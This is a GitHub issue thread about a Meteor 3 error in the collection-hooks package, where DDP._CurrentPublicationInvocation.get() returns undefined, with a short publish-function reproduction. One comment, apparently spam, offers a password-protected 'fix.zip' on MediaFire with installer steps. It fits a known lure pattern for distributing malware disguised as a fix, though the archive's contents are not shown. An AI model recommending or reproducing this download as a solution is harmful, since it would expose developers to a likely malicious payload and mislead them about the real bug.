### ISSUE TITLE
Meteor 3: Error: Meteor.userId (DDP._CurrentPublicationInvocation.get())

### ISSUE THREAD

**Issue by aboire** [Meteor-Community-Packages/meteor-collection-hooks#314]
with the package install it returns DDP._CurrentPublicationInvocation.get() undefined

https://github.com/meteor/meteor/issues/13258#issuecomment-2314923925

https://github.com/Meteor-Community-Packages/meteor-collection-hooks/blob/migrate/3.0/server.js#L30

```js
Meteor.publish('TestBindEnvironment', async function () {

  if (!this.userId) {
    return null;
  }
  const test = Meteor.bindEnvironment(async () => {
    console.log('bindEnvironment _CurrentPublicationInvocation', DDP._CurrentPublicationInvocation.get());
  });
  await test();

  return this.ready();
});
```

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jankapunkt** [comment]
@aboire which version of this package did this occur?
